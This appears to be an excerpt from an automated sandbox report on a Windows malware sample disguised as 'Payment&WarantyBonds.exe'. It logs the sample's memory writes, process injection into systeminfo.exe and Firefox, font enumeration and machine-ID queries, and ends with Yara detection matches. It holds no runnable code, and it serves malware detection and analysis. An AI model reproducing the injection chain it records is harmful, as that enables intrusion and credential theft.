                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory written: C:\Users\user\Desktop\Payment&WarantyBonds.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: NULL target: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: NULL target: C:\Windows\SysWOW64\systeminfo.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: NULL target: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe protection: read write
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: NULL target: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\systeminfo.exe Thread register set: target process: 8020
                Source: C:\Windows\SysWOW64\systeminfo.exe Thread APC queued: target process: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
                Source: C:\Windows\SysWOW64\systeminfo.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: lVlYtqLlYCJP.exe, 00000006.00000000.1945587937.0000000001721000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106494238.0000000001720000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099466223.0000000000E60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: lVlYtqLlYCJP.exe, 00000006.00000000.1945587937.0000000001721000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106494238.0000000001720000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099466223.0000000000E60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: lVlYtqLlYCJP.exe, 00000006.00000000.1945587937.0000000001721000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106494238.0000000001720000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099466223.0000000000E60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: lVlYtqLlYCJP.exe, 00000006.00000000.1945587937.0000000001721000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106494238.0000000001720000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099466223.0000000000E60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Users\user\Desktop\Payment&WarantyBonds.exe VolumeInformation
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
